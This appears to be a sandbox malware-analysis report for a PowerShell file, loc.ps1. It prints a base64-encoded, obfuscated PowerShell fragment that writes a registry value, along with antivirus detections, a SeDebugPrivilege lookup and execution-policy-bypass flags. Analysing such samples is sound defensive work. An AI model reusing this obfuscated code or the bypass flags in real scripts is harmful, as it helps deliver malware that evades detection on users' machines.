MAaABBAFIAXQAxADIAMgApACwAWwBzAFQAUgBJAG4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAIAAtAE4AYQBtAGUAIAAkAHsAUgBgAE4AbQB9ACAALQBWAGEAbAB1AGUAIAAkAHsAZgBTAGAAVABSAH0AIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBnACcALAAnAG4AJwAsACcAUwB0AHIAaQAnACkAOwA=

File has been identified by 2 AntiVirus engines on VirusTotal as malicious (2 events)

Symantec	CL.Downloader!gen10
ESET-NOD32	PowerShell/Obfuscated.Z suspicious

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 14, 2023, 5:09 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

Creates a suspicious Powershell process (2 events)

option	-ep bypass				value	Attempts to bypass execution policy
option	-nop				value	Does not load current user profile

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

loc.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All